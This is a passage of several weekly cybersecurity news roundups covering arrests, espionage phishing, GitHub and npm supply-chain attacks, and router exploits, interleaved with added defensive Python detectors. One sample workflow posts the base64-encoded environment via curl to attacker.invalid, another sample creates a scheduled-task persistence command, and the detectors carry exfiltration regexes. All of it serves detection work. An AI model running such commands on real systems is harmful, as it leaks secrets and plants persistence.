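            "permissions": sorted(risky),
            "recent_grant": recent_grant,
            "recent_credential": recent_cred,
            "foreign_tenant": foreign,
            "priority": "high" if (recent_grant or recent_cred or foreign) else "review",
        })
    return findings


# Constructed inventory: one suspicious app, one stale legacy grant, one benign bot.
TENANT = "11111111-1111-1111-1111-111111111111"
REFERENCE_NOW = datetime(2025, 9, 25, tzinfo=timezone.utc)
SAMPLE_SPS = [
    {"displayName": "Mailbox Backup Sync", "appId": "aaaaaaaa-0000-0000-0000-000000000001",
     "appOwnerOrganizationId": "22222222-2222-2222-2222-222222222222",
     "appRoleAssignments": [
         {"resourceDisplayName": "Microsoft Graph", "permission": "Mail.Read",
          "createdDateTime": "2025-09-15T08:12:00Z"},
         {"resourceDisplayName": "Office 365 Exchange Online", "permission": "full_access_as_app",
          "createdDateTime": "2025-09-15T08:13:00Z"}],
     "passwordCredentials": [{"startDateTime": "2025-09-15T08:10:00Z"}], "keyCredentials": []},
    {"displayName": "HR Archive", "appId": "aaaaaaaa-0000-0000-0000-000000000002",
     "appOwnerOrganizationId": TENANT,
     "appRoleAssignments": [
         {"resourceDisplayName": "Microsoft Graph", "permission": "Mail.ReadWrite",
          "createdDateTime": "2024-03-02T10:00:00Z"}],
     "passwordCredentials": [{"startDateTime": "2024-03-02T09:55:00Z"}], "keyCredentials": []},
    {"displayName": "Teams Notifier", "appId": "aaaaaaaa-0000-0000-0000-000000000003",
     "appOwnerOrganizationId": TENANT,
     "appRoleAssignments": [
         {"resourceDisplayName": "Microsoft Graph", "permission": "User.Read.All",
          "createdDateTime": "2025-09-20T12:00:00Z"}],
     "passwordCredentials": [], "keyCredentials": []},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_SPS, TENANT, REFERENCE_NOW):
        print(f["priority"], f["app"], f["permissions"])
```

The stale HR grant is still worth a review pass even though it ranks lower: a long-standing app-only Mail.ReadWrite grant is exactly the kind of credential an intruder who has already read the admin’s mailbox can quietly reuse.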

The Good, the Bad and the Ugly in Cybersecurity – Week 38

The Good | Federal Courts Crack Down on BreachForums & UNC3944 Cybercrime Operators

Conor Brian Fitzpatrick, the 22-year-old operator of the notorious BreachForums hacking site, has been resentenced to three years in prison after a federal appeals court overturned his earlier punishment of time served and supervised release. Known online as “Pompompurin”, Fitzpatrick launched BreachForums in 2022 after the FBI dismantled RaidForums, quickly attracting more than 330,000 members.

The site was a major hub for trading data stolen from telecom providers, healthcare companies, social networks, investment firms, and U.S. government agencies. Fitzpatrick was first arrested in March 2023 and pleaded guilty to being the site’s administrator. Prosecutors sought more than 15 years due to his violations of pretrial conditions, which included secretly using VPNs and unmonitored devices, but the court ultimately imposed a three-year prison term.

Meanwhile, U.K. authorities have advanced their fight against hacking collectives. Two teenagers, 18-year-old Owen Flowers of Walsall and 19-year-old Thalha Jubair of East London, were arrested in connection with the August 2024 cyberattack on Transport for London (TfL). Both are believed to be members of the UNC3944 collective, known most recently for targeting large organizations across multiple verticals.

Courtroom sketch of Flowers and Jubair (Source: Elizabeth Cook/PA Media, Telegraph)

Flowers faces additional charges for conspiring to breach U.S. healthcare providers, while Jubair has been charged in the U.S. with computer fraud, wire fraud, and money laundering tied to more than 120 global breaches that netted $115 million in ransom. The TfL attack disrupted internal operations, delayed refunds, and exposed customer data including names, addresses, and contact details. Previous arrests in July linked UNC3944 to cyberattacks on major UK retailers such as Harrods and Marks & Spencer.

The Bad | China-Linked TA415 Uses U.S.-China Trade Lures in Targeted Espionage Campaigns

A Chinese state-sponsored threat actor known as TA415 has been linked to a string of spearphishing attacks against U.S. government entities, think tanks, and academic institutions in July and August. The campaign tailored its lures by using U.S.-China economic and trade topics, even impersonating the U.S.-China Business Council and the Chair of the House Select Committee on Strategic Competition to target individuals focused on relations and policy between the two nations.

Emails appeared to invite recipients to closed-door briefings and were sent from uschina@zohomail[.]com, with links to archives hosted on Zoho WorkDrive, Dropbox, and OpenDrive. These archives contained a decoy PDF and a Windows shortcut (LNK) file, which executed a batch script that deployed WhirlCoil, an obfuscated Python loader. The malware was able to establish persistence via scheduled tasks and open Visual Studio Code Remote Tunnels to grant attackers backdoor access and enable arbitrary command execution.

TA415 phishing emails (Source: Proofpoint)

The collected data, including system information and user files, was exfiltrated through request logging services in base64-encoded HTTP POST requests. While early variants downloaded WhirlCoil components from Pastebin and Python.org, the infection chain has remained largely consistent since its first noted use in 2024 against aerospace, insurance, and manufacturing firms.

The continued abuse of Visual Studio Code Remote Tunnels highlights the challenge for defenders: because the feature is legitimate, it blends into normal developer workflows and is hard to detect without specific monitoring. Analysts note that TA415, which overlaps with APT41, has gradually refined this technique over the past year, ramping up activity in recent months as U.S.-China trade negotiations intensify.
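Because a tunnel launch looks like ordinary developer activity, the useful signal is context: which process started it, where the binary lives, and whether it was registered through a scheduled task. The following added example (not code from the original article or from Proofpoint) scores constructed Windows process-creation events along those lines; the `code tunnel` command form and the `--accept-server-license-terms` flag are real VS Code CLI usage, while the parent-process and path heuristics, the user name, file paths and task names are assumptions made for this example.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events, not real telemetry. Paths, user name
# and task names are placeholders invented for this example.
EVENTS: List[Dict[str, str]] = [
    {   # developer opening a tunnel from a terminal: worth a look, not an alert
        "parent": "powershell.exe",
        "image": r"C:\Program Files\Microsoft VS Code\bin\code.exe",
        "cmdline": r'"C:\Program Files\Microsoft VS Code\bin\code.exe" tunnel',
    },
    {   # script interpreter starting a non-interactive tunnel from a temp dir
        "parent": "python.exe",
        "image": r"C:\Users\alice\AppData\Local\Temp\code.exe",
        "cmdline": r"code.exe tunnel --accept-server-license-terms --name DESKTOP-EXAMPLE",
    },
    {   # scheduled task whose action runs a script out of the user profile
        "parent": "cmd.exe",
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": (r'schtasks /create /sc minute /mo 5 /tn "ExampleUpdater" '
                    r'/tr "C:\Users\alice\AppData\Local\Programs\Python\python.exe '
                    r'C:\Users\alice\AppData\Roaming\loader.py" /f'),
    },
    {   # vendor installer registering its updater: benign
        "parent": "setup.exe",
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": r'schtasks /create /sc daily /tn "VendorUpdate" /tr "C:\Program Files\Vendor\update.exe"',
    },
]

# 'code tunnel' is the documented VS Code CLI form; code-tunnel is the name of
# the standalone CLI binary. The flag accepts the server license without a prompt.
TUNNEL_LAUNCH = re.compile(r'(?i)\bcode(?:-tunnel)?(?:\.exe)?"?\s+tunnel\b')
NON_INTERACTIVE = re.compile(r"(?i)--accept-server-license-terms")
USER_WRITABLE = re.compile(r"(?i)\\(?:AppData|Temp|ProgramData|Public)\\")
SCHTASKS_CREATE = re.compile(r"(?i)\bschtasks(?:\.exe)?\b.*\s/create\b")
TASK_ACTION = re.compile(r'(?i)\s/tr\s+(?:"([^"]*)"|(\S+))')
SCRIPT_HOSTS = re.compile(r"(?i)\b(?:python|pythonw|wscript|cscript|mshta|powershell|cmd)(?:\.exe)?\b")
# Parents that should not normally be starting a developer tunnel (assumption)
LOADER_PARENTS = {"python.exe", "pythonw.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "svchost.exe", "taskeng.exe"}


def check_tunnel(event: Dict[str, str]) -> Optional[Dict]:
    """Report every Remote Tunnel launch; escalate when the context is wrong."""
    if not TUNNEL_LAUNCH.search(event["cmdline"]):
        return None
    reasons = []
    if event["parent"].lower() in LOADER_PARENTS:
        reasons.append(f"spawned by {event['parent']}")
    if USER_WRITABLE.search(event["image"]):
        reasons.append("binary runs from a user-writable directory")
    if NON_INTERACTIVE.search(event["cmdline"]):
        reasons.append("license accepted non-interactively")
    return {
        "rule": "vscode_remote_tunnel",
        "severity": "high" if len(reasons) >= 2 else "low",
        "reasons": reasons or ["tunnel started from an interactive shell; review"],
    }


def check_scheduled_task(event: Dict[str, str]) -> Optional[Dict]:
    """Flag schtasks /create when the task action is a script interpreter
    and/or lives under a user-writable path."""
    cmd = event["cmdline"]
    if not SCHTASKS_CREATE.search(cmd):
        return None
    m = TASK_ACTION.search(cmd)
    action = (m.group(1) or m.group(2) or "") if m else ""
    reasons = []
    if USER_WRITABLE.search(action):
        reasons.append("task action under a user-writable directory")
    if SCRIPT_HOSTS.search(action):
        reasons.append("task action runs a script interpreter")
    if not reasons:
        return None
    return {
        "rule": "scheduled_task_persistence",
        "severity": "high" if len(reasons) == 2 else "medium",
        "reasons": reasons,
    }


def scan(events: List[Dict[str, str]]) -> List[Dict]:
    """Run both checks over the event list; one finding per hit."""
    findings = []
    for idx, event in enumerate(events):
        for check in (check_tunnel, check_scheduled_task):
            hit = check(event)
            if hit:
                findings.append({"event": idx, **hit})
    return findings


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"event {f['event']} [{f['severity']}] {f['rule']}: {'; '.join(f['reasons'])}")
```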

The Ugly | Chaos Mesh Vulnerabilities Put Kubernetes at Risk of Full Cluster Takeovers

Researchers have revealed multiple critical flaws in Chaos Mesh, an open-source Chaos Engineering platform for Kubernetes designed to simulate, test, and identify potential weak spots in pods, networks, and other components. If exploited, the four vulnerabilities, collectively named Chaotic Deputy, could allow attackers to take over entire clusters.

The report warned that attackers need only minimal in-cluster network access to exploit the vulnerabilities, enabling them to run fault injections, shut down pods, disrupt communications, and even steal privileged tokens for further attacks.

Source: JFrog Security

CVE-2025-59358 (CVSS 7.5) exposes an unauthenticated GraphQL debugging server that lets attackers kill arbitrary processes in any Kubernetes pod, which could lead to cluster-wide denial-of-service. CVE-2025-59359, CVE-2025-59360, and CVE-2025-59361 (all rated CVSS 9.8) are command injection flaws in the Chaos Controller Manager’s GraphQL mutations (cleanTcs, killProcesses, and cleanIptables, respectively) that allow remote code execution (RCE).

Chaotic Deputy stems from insufficient authentication in the Chaos Controller Manager’s GraphQL server. An in-cluster attacker with initial access to a network could chain the four vulnerabilities to execute arbitrary commands on the Chaos Daemon, achieving full cluster compromise. The result could mean data theft, service disruption, and lateral movement across Kubernetes environments.

The flaws were responsibly disclosed in early May and patched in Chaos Mesh version 2.7.3, released August 21. Users are strongly urged to upgrade immediately, and if patching isn’t possible, mitigations include restricting network traffic to the Chaos Mesh daemon and API server as well as avoiding deployments in open or weakly secured environments.

Researchers stressed that while Chaos Engineering platforms offer the ability to test resilience, their deep cluster access and flexibility make them a high-value target, and vulnerabilities like Chaotic Deputy can be especially risky if left unpatched.

The Good, the Bad and the Ugly in Cybersecurity – Week 37

The Good | U.S. Charges Ransomware Operator, Sanctions $10B Scam Networks & Secures BlackDB Guilty Plea

Kosovo national Liridon Masurica (33) has pleaded guilty to operating BlackDB[.]cc, a cybercrime marketplace active online from 2018 to 2025. Arrested in December 2024 and extradited to the U.S. this May, Masurica has admitted to selling stolen credit cards, compromised accounts, server credentials, and personally identifiable information (PII), primarily from U.S. victims. Cybercriminals would purchase and use the data for identity theft, tax fraud, and financial crimes. Charged with six counts of fraud, Masurica faces up to 55 years in prison.

While Masurica’s conviction highlights the dangers of underground markets, U.S. authorities are also focusing on larger-scale fraud networks. The Department of the Treasury has sanctioned major cyber scam networks in Myanmar (formerly Burma) and Cambodia that stole over $10 billion from Americans in 2024, a 66% increase from 2023. These operations, often run with forced labor and human trafficking, engage in romance scams and fake crypto schemes. OFAC named 19 individuals and entities tied to the Karen National Army (KNA) and Cambodian crime groups. Even without arrests, the sanctions freeze U.S. assets, cut access to international finance, and disrupt operations.

Building on these actions, the U.S. Department of Justice has charged Ukrainian national Volodymyr Tymoshchuk (aka deadforz, Boba, msfv, and farnetwork) for administering the LockerGoga, MegaCortex, and Nefilim ransomware operations. From 2019 to 2021, he and accomplices breached over 250 companies worldwide, stealing millions and disrupting critical services. Tymoshchuk allegedly managed Nefilim, granting affiliates access for a share of ransom payments. Already on FBI and EU most wanted lists, he faces multiple fraud and computer crime charges. The U.S. State Department is offering $10 million for information leading to his capture.

Source: FBI

The Bad | ‘GhostAction’ Supply Chain Attack Exfiltrates Thousands of Secrets from GitHub

Cyber researchers have uncovered a large-scale software supply chain attack on GitHub dubbed “GhostAction”, which has so far exposed more than 3,300 secrets, including PyPI, npm, DockerHub, and GitHub tokens, Cloudflare API keys, AWS access keys, and database credentials.

The campaign came to light after suspicious activity was detected in the FastUUID project on September 2. Attackers had compromised maintainer accounts and injected a malicious GitHub Actions workflow designed to trigger on code pushes or manual dispatch.

Once activated, the workflow harvested secrets from the environment and exfiltrated them via a curl POST request to an attacker-controlled server. In FastUUID’s case, its PyPI token was stolen, though no malicious package uploads were made prior to the breach being contained.

Malicious workflow run (Source: GitGuardian)

Further investigation revealed that the incident was far more widespread than just FastUUID. At least 817 repositories were found to contain similar malicious commits, all sending stolen secrets to the same endpoint. To maximize the theft, attackers enumerated secret names from legitimate workflows, then hardcoded them into their own scripts.
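A maintainer can catch the pattern described above, a step that references an unusual number of secrets and hands them to curl, with a plain-text audit of the workflow file. The following added example (not the project’s or GitGuardian’s code) does that over a constructed workflow; the step splitting is a deliberately simple text pass rather than a YAML parser, the secret threshold and trusted-host list are assumptions, and attacker.invalid is a placeholder.

```python
import re
from typing import Dict, List

# Constructed sample workflow, modelled on the pattern described above: one
# ordinary publishing step, and one step that references many secrets and
# posts the environment to an outside host. attacker.invalid is a placeholder.
SAMPLE_WORKFLOW = """\
name: CI
on:
  push:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_TOKEN }}
        run: python -m twine upload dist/*
      - name: Collect
        env:
          A: ${{ secrets.PYPI_TOKEN }}
          B: ${{ secrets.NPM_TOKEN }}
          C: ${{ secrets.AWS_ACCESS_KEY_ID }}
          D: ${{ secrets.DOCKERHUB_PASSWORD }}
        run: |
          curl -s -X POST -d "$(env | base64 -w0)" https://attacker.invalid/collect
"""

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
# curl/wget invocations that send data (the common data-carrying flags)
EXFIL_CMD = re.compile(r"\b(?:curl|wget)\b.*?(?:\s-d\s|--data|--post-data|\s-F\s|\s-T\s|-X\s*POST)")
URL_HOST = re.compile(r"https?://([^/\s\"']+)")
# Hosts a publishing step legitimately talks to (assumption; extend per project)
TRUSTED_HOSTS = {"api.github.com", "github.com", "upload.pypi.org", "registry.npmjs.org"}


def split_steps(workflow: str) -> List[str]:
    """Cut the raw text into one chunk per list item under a 'steps:' key.
    A deliberately simple text pass: good enough to audit, no YAML parser."""
    steps: List[List[str]] = []
    steps_indent = None
    for line in workflow.splitlines():
        indent = len(line) - len(line.lstrip())
        if re.match(r"^\s*steps:\s*$", line):
            steps_indent = indent
            continue
        if steps_indent is None or not line.strip():
            continue
        if indent <= steps_indent:          # dedented: left the steps block
            steps_indent = None
            continue
        if re.match(r"^\s*-\s", line):
            steps.append([line])
        elif steps:
            steps[-1].append(line)
    return ["\n".join(s) for s in steps]


def audit_step(step: str) -> Dict:
    """Collect the secrets a step references and any untrusted host it sends
    data to with curl/wget (flags and URL are expected on the same line)."""
    name = re.search(r"^\s*-?\s*name:\s*(.+)$", step, re.M)
    hosts = set()
    for line in step.splitlines():
        if EXFIL_CMD.search(line):
            hosts.update(h for h in URL_HOST.findall(line) if h not in TRUSTED_HOSTS)
    return {
        "name": name.group(1).strip() if name else "<unnamed>",
        "secrets": sorted(set(SECRET_REF.findall(step))),
        "untrusted_hosts": sorted(hosts),
    }


def find_suspicious_steps(workflow: str, max_secrets: int = 3) -> List[Dict]:
    """Flag steps that reference more than max_secrets secrets, or that
    reference any secret while posting data to a host outside TRUSTED_HOSTS."""
    findings = []
    for step in split_steps(workflow):
        info = audit_step(step)
        reasons = []
        if len(info["secrets"]) > max_secrets:
            reasons.append(f"references {len(info['secrets'])} secrets")
        if info["secrets"] and info["untrusted_hosts"]:
            reasons.append("sends data to " + ", ".join(info["untrusted_hosts"]))
        if reasons:
            findings.append({**info, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_steps(SAMPLE_WORKFLOW):
        print(f"step '{f['name']}': " + "; ".join(f["reasons"]))
```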

By September 5, researchers had notified GitHub, npm, and PyPI, while also filing issues across 573 impacted repositories. By that point, one hundred projects had already detected and reverted the malicious commits. Soon after disclosure, the exfiltration endpoint was taken offline, but not before significant damage occurred.

The exposure affects at least nine npm and 15 PyPI packages, leaving open the possibility of malicious releases unless maintainers revoke compromised tokens. While the campaign shares similarities with the AI-powered ‘s1ngularity’ attack on over 2100 GitHub accounts from August, researchers believe GhostAction is an altogether separate operation.

The Ugly | House Panel Warns of Chinese Cyber Espionage Exploiting Political Communication

Highly targeted cyber espionage campaigns amidst tense trade negotiations between the U.S. and China have led the House Select Committee on China to issue an advisory warning. These campaigns, linked to the PRC, are focused on U.S. government agencies, business groups, law firms, and think tanks while the two economic powers continue talks on tariffs and diplomacy.

According to the committee, suspected threat actors based in China impersonated Republican Party Congressman John Robert Moolenaar (R-MI) in phishing emails sent out to trusted contacts. The emails, framed as requests for input on sanctions against China, carried attachments that deployed malware to steal sensitive data and establish persistence. So far, the actors are believed to be APT41, a prolific state-backed group known for global espionage campaigns.

Source: SOPA Images Limited via Alamy Stock Photo (Dark Reading)

Moolenaar, who is also the Chairman of the House Select Committee, stressed that these attacks aim to steal U.S. strategy and leverage it against Congress, the Administration, and the American people. Historically, the campaign aligns with tactics often used by state-sponsored threat actors, including abuse of cloud services and legitimate software to obscure activity and exploit personal or unofficial communication channels. The Chinese embassy has rejected the allegations, stating it “firmly opposes and combats all forms of cyber attacks and cyber crime” and opposes accusations without solid evidence.

Adversaries are increasingly exploiting the expanding channels of modern political communication. Not all exchanges occur over official government accounts or devices, and attackers are capitalizing on trusted officials who engage with partners through personal or less-secure channels. By masquerading as familiar public figures and using the right lures, they can appear more authentic and carry out their objectives while evading detection.

The Good, the Bad and the Ugly in Cybersecurity – Week 36

The Good | U.S. Puts $10m bounty on Heads of Three Russian FSB Threat Actors

The U.S. Department of State has announced a bounty of up to $10 million for information on three Russian Federal Security Service (FSB) officers accused of orchestrating cyberattacks against U.S. critical infrastructure. The officers, Marat Valeryevich Tyukov, Mikhail Mikhailovich Gavrilov, and Pavel Aleksandrovich Akulov, are thought to be linked to FSB’s Center 16 (aka Military Unit 71330).

Source: U.S. Department of Justice

The same trio was also charged in March 2022 for a long-running campaign (2012–2017) that targeted U.S. government agencies, including the Nuclear Regulatory Commission and various energy firms. One such firm, Wolf Creek Nuclear Operating Corporation, operates a nuclear power plant based in Burlington, Kansas. According to the State Department, Tyukov, Gavrilov, and Akulov’s operations extended to over 500 foreign energy companies in 135 other countries.

Just a few weeks ago, the FBI warned that the same actors had been exploiting CVE-2018-0171 in outdated Cisco networking devices over the past year. The vulnerability allows attackers to remotely execute code on unpatched systems, enabling them to breach multiple companies across U.S. critical infrastructure sectors. The networking firm has since released a patch for the flaw and urged network admins to update their devices.

The FSB-linked group has a long history of targeting U.S. state, local, tribal, and aviation entities. Tips can be submitted anonymously via the department’s Tor-based Rewards for Justice channel, with the possibility of relocation for informants.

The Bad | Ethereum Smart Contracts Drive New NPM Malware Delivery Campaign

Two newly uncovered malicious npm packages are using Ethereum smart contracts to conceal and deliver malware, highlighting evolving attacker tactics in software supply chain attacks. The packages, colortoolsv2 and mimelib2, were uploaded in July 2025 and later removed.

According to security researchers, the packages trigger code that fetches a second-stage payload from attacker-controlled servers once they are imported into a project. While the packages’ malicious functionality is easy to expose on inspection, the GitHub projects that imported them made them appear credible to unsuspecting users. What sets this operation apart is its use of Ethereum smart contracts to host the URLs for payload delivery, a method reminiscent of the EtherHiding technique. By leveraging decentralized blockchain infrastructure, attackers can better obscure their command and control (C2) mechanisms and avoid takedowns.

Smart contract seen on the blockchain (Source: ReversingLabs)

Further investigation has linked the npm packages to a wider campaign involving bogus GitHub repositories disguised as cryptocurrency trading tools, including solana-trading-bot-v2, ethereum-mev-bot-v2, and hyperliquid-trading-bot. These repositories all falsely advertised automated trading capabilities, targeting developers and crypto enthusiasts. The accounts tied to this activity were connected to a distribution-as-a-service (DaaS) cluster dubbed ‘Stargazers Ghost Network’, known for manipulating repository popularity through fake stars, forks, and commits.

These incidents point to a broader trend: crypto-related supply chain attacks are accelerating and growing more sophisticated. As threat actors weaponize blockchain technology to distribute malware, developers are being urged to go beyond surface metrics when evaluating libraries and to rigorously vet both open-source and third-party code for signs of tampering. Proactive scrutiny, including reviewing not just downloads and commit history but also the credibility of maintainers, remains the first line of defense against malware hidden in trusted repositories.

The Ugly | DPRK Threat Actors Leverage Cyber Threat Intel Tools to Manage Campaigns

SentinelLABS and Validin have revealed that North Korea-aligned threat actors behind the Contagious Interview campaign cluster actively monitor cyber threat intelligence (CTI) platforms to track exposure of their infrastructure and scout new assets. The actors operate in coordinated teams, communicating via common enterprise tools like Slack, while drawing on sources such as Validin, VirusTotal, and Maltrail to inform their operations.

Although they recognize their infrastructure is detectable, these actors make only limited modifications to conceal it. Instead, they focus on rapidly deploying new assets following service provider takedowns, maintaining high victim engagement over preserving older infrastructure. This approach reflects both resource constraints and internal incentives, as decentralized teams compete to protect individual assets rather than coordinate large-scale security updates.

Between January and March 2025, SentinelLABS identified more than 230 victims, most of them cryptocurrency professionals, though the actual number is likely higher. Targets are lured through fake job offers using the ClickFix social engineering technique, which manipulates candidates into running malicious commands under the guise of assessments or troubleshooting errors.

Contagious Interview victimology (Source: SentinelLABS)

Accompanying reporting by Reuters highlights how these scams have become common in the crypto industry. Interviews with victims, including developers, consultants, and executives, confirmed the sophistication of the fraudulent offers as well as financial losses suffered. The reporting humanizes the impact and the breadth of the campaign, showing how Pyongyang-backed actors exploit trust and professional networks to steal digital assets.

Effective mitigation requires vigilance from job seekers, especially those in the cryptocurrency sector, alongside proactive disruption of malicious infrastructure by service providers. Close collaboration, intelligence-sharing, and media exposure are also essential in reducing the reach and impact of these campaigns.

The Good, the Bad and the Ugly in Cybersecurity – Week 35

The Good | Interpol Cracks Down on Cybercrime as U.S. Sanctions North Korean IT Scheme

Interpol announced the arrest of over 1200 suspects in Operation Serengeti 2.0, a three-month crackdown on cybercrime across Africa. Conducted between June and August, the operation dismantled 11,432 malicious infrastructures, seized $97.4 million, and disrupted attacks impacting nearly 88,000 victims worldwide. Investigators from 18 African nations and the U.K. collaborated under the African Joint Operation against Cybercrime, supported by various private sector partners. Targets included ransomware operators, online scammers, and business email compromise (BEC) groups.

Source: Group-IB

This is the latest in a series of coordinated operations across Africa, following earlier successes such as Operation Red Card and Operation Serengeti (2024). Interpol emphasized that each initiative strengthens cross-border cooperation, expanding both intelligence sharing and investigative expertise, which garner larger, more impactful results in the fight against transnational cybercrime.

The U.S. Treasury’s OFAC has sanctioned two individuals and two entities tied to North Korea’s illicit remote IT worker scheme, which funds its weapons and missile programs. Russian national Vitaliy Sergeyevich Andreyev, North Korean official Kim Ung Sun, Shenyang Geumpungri Network Technology (China), and Korea Sinjin Trading Corporation were named for defrauding American businesses. Andreyev allegedly helped transfer nearly $600,000 in cryptocurrency-to-cash payments, while Shenyang Geumpungri generated over $1 million in profits since 2021.

The IT worker scheme, specifically, embeds North Korean IT workers in global companies using fake identities and stolen documents. Recent investigations indicate a growing reliance on AI tools to build false resumes, pass interviews, and deliver work. Authorities warn the operation also enables malware insertion, data theft, and extortion against targeted firms.

The Bad | UpCrypter Malware Loader Spreads Through Fake Voicemails to Install RAT Payloads

A new phishing campaign distributing a malware loader known as UpCrypter is using fake voicemail notifications and purchase orders as lures. Active since early August 2025, the campaign has primarily targeted organizations in manufacturing, technology, healthcare, construction, and retail/hospitality, with infections observed in Austria, Belarus, Canada, Egypt, India, Pakistan, and several others worldwide.

The attack begins with carefully crafted phishing emails containing malicious URLs to fraudulent landing pages that mimic corporate branding by embedding a victim’s domain name and logo. Victims are prompted to download what appears to be a voicemail or PDF, delivered as a ZIP archive containing an obfuscated JavaScript file. Once executed, the script checks for internet connectivity, scans for forensic tools or sandbox environments, and then retrieves the next-stage malware from an external server.

Source: Fortinet

UpCrypter serves as a dropper for multiple remote access tools (RATs), including PureHVNC RAT, DCRat, and Babylon RAT, all of which enable full control of infected systems and provide attackers with remote surveillance, credential theft, and command execution capabilities. Payloads may be delivered in plain text or concealed via steganography inside images. A parallel distribution method uses a Microsoft Intermediate Language (MSIL)-based loader that performs similar anti-analysis checks before fetching an obfuscated PowerShell script, a DLL, and the main payload.

The final execution sequence embeds data from the DLL and payload directly into memory, bypassing the file system to minimize forensic artifacts. Security researchers warn that UpCrypter’s evolving design, combining layered obfuscation, sandbox evasion, and flexible RAT deployment, points to an actively maintained delivery ecosystem capable of persisting across environments that rely only on traditional defenses.

The Ugly | Salt Typhoon Expands Global Cyber-Espionage Campaign via Router Exploits

Authorities from 13 nations, including the U.S., U.K., Canada, Germany, and Japan, have issued a joint security advisory linking three Chinese tech companies to advanced persistent threat (APT) group Salt Typhoon (also tracked as UNC2286). Receiving intelligence services, cyber tools, and stolen data, the China-based actor has been able to intensify its global cyberespionage operations. Targeting has been focused on telecommunications, government, transportation, and military infrastructure since at least 2019.

The group focuses on exploiting backbone, provider edge (PE), and customer edge (CE) routers, using flaws such as CVE-2018-0171, CVE-2023-20198, CVE-2023-20273, CVE-2023-46805, CVE-2024-21887, and CVE-2024-3400. Compromised devices are modified for persistence through generic routing encapsulation (GRE) tunnels, altered Access Control Lists (ACLs), custom containers, and added IP-controlled ports. Attackers further exploit Terminal Access Controller Access Control System Plus (TACACS+) authentication traffic on TCP/49 to harvest highly privileged administrator credentials, enabling lateral movement across network environments.

To date, Salt Typhoon has attacked over 600 organizations across 80 countries. The advisory emphasized that intrusions into telecom and transportation networks have enabled Chinese intelligence services to track communications and movements worldwide. Experts urge defenders to watch for configuration changes, container activity, unusual tunnels, and integrity issues in firmware and logs.
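The watch-list above (new tunnels, ACL edits, container activity, added management ports) can be turned into a configuration-drift check run against periodic config backups. The following added example (not from the advisory or any vendor tool) diffs two constructed IOS-style snapshots and tags each change by category; the syntax follows Cisco IOS conventions as the author understands them, and the category patterns, addresses and interface names are assumptions made for this example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed IOS-style snapshots (addresses and names are placeholders).
BASELINE = """\
ip access-list extended MGMT
 permit tcp 10.10.0.0 0.0.255.255 any eq 22
 deny ip any any log
!
interface GigabitEthernet0/0
 ip address 198.51.100.1 255.255.255.0
!
line vty 0 4
 access-class MGMT in
 transport input ssh
"""

CURRENT = """\
ip access-list extended MGMT
 permit tcp 10.10.0.0 0.0.255.255 any eq 22
 permit tcp host 203.0.113.77 any
 deny ip any any log
!
interface GigabitEthernet0/0
 ip address 198.51.100.1 255.255.255.0
!
interface Tunnel100
 ip address 10.99.0.1 255.255.255.252
 tunnel source GigabitEthernet0/0
 tunnel destination 203.0.113.77
!
ip http server
!
line vty 0 4
 access-class MGMT in
 transport input ssh
"""

# Change categories a defender would triage first. The keyword patterns are
# assumptions covering common IOS syntax, not an exhaustive list.
CATEGORIES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("tunnel_interface", re.compile(r"^interface Tunnel\d+")),
    ("acl_change",       re.compile(r"^(?:ip(?:v6)? )?access-list ")),
    ("container",        re.compile(r"^(?:app-hosting|iox)\b")),
    ("management_port",  re.compile(r"^(?:ip http (?:secure-)?server|ip ssh port \d+|transport input)")),
    ("aaa_change",       re.compile(r"^(?:tacacs|aaa )")),
]


def parse_blocks(config: str) -> Dict[str, List[str]]:
    """Map each top-level line to its indented sub-lines (IOS nests one level)."""
    blocks: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for raw in config.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw.startswith(" ") and current is not None:
            blocks[current].append(raw.strip())
        elif not raw.startswith(" "):
            current = raw.strip()
            blocks.setdefault(current, [])
    return blocks


def block_diff(old: Dict[str, List[str]], new: Dict[str, List[str]]) -> List[Tuple[str, Optional[str]]]:
    """Lines present in new but not in old, as (header, line). A header that is
    itself new is listed once with line=None, followed by its whole body."""
    out: List[Tuple[str, Optional[str]]] = []
    for header, body in new.items():
        if header not in old:
            out.append((header, None))
            out.extend((header, line) for line in body)
        else:
            seen = set(old[header])
            out.extend((header, line) for line in body if line not in seen)
    return out


def classify(header: str, line: Optional[str]) -> Optional[str]:
    """First category whose pattern matches the block header or the line."""
    for name, pattern in CATEGORIES:
        if pattern.search(header) or (line is not None and pattern.search(line)):
            return name
    return None


def drift_report(baseline: str, current: str) -> List[Dict]:
    """Tag added and removed configuration lines with their category."""
    old, new = parse_blocks(baseline), parse_blocks(current)
    findings = []
    for change, delta in (("added", block_diff(old, new)), ("removed", block_diff(new, old))):
        for header, line in delta:
            category = classify(header, line)
            if category:
                findings.append({"change": change, "category": category,
                                 "header": header, "line": line})
    return findings


if __name__ == "__main__":
    for f in drift_report(BASELINE, CURRENT):
        print(f"{f['change']:7} {f['category']:17} {f['header']} :: {f['line'] or ''}")
```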

To counter Salt Typhoon and similar threats, the guidance calls for rapid patching, adoption of zero-trust models, disabling unused services, and strengthening authentication. Officials warn that adversaries will only grow more sophisticated, stressing the need to retire outdated systems and harden defenses.

The Good, the Bad and the Ugly in Cybersecurity – Week 34

The Good | Courts Crack Down on Cybercriminals & Python Package Index Boosts Security

Noah Michael Urban, a key UNC3944 member, has been sentenced to 10 years in prison after pleading guilty to wire fraud and conspiracy. Arrested in January 2024, he and four others were charged with stealing millions from cryptocurrency wallets using SMS phishing, SIM swaps, and stolen employee credentials. Urban admitted making “several million dollars”, though much was lost gambling. He must pay $13 million restitution. UNC3944 is notorious for its high-profile breaches. Most recently, the collective has set its sights on major entities within the retail, insurance, and transportation verticals.

Booking photo of Urban (Source: Volusia County Sheriff’s Office)

